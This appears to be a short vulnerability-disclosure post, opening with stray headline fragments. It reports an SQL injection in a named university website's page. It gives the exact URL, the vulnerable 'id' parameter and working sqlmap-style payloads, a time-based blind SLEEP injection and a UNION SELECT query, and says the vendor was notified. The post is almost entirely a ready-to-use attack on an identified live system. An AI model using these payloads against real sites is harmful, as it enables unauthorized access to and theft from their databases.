Pakistan FO to seek ISI help against cyber attacks
May 16, 2016http://www.aiou.edu.pk – sql vulnerability
July 26, 2016
website : www.hu.edu.pk/oldwebsitehu/webtest/view_deg_prog.php?id=1
Vuln type : Sql Injection
Submitted by : Waqas Haider
POC :
Vuln-Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Title: Generic UNION query (NULL) – 4 columns
Payload: id=1 UNION ALL SELECT
NULL,CONCAT(0x7178706b71,0x796a6a65696172416b5a596250664269416a636a474d6a
484e57674f76455052517452796d744c74,0x71706b6a71),NULL,NULL– FAic
Type: UNION query
Notification : Vendor Notified
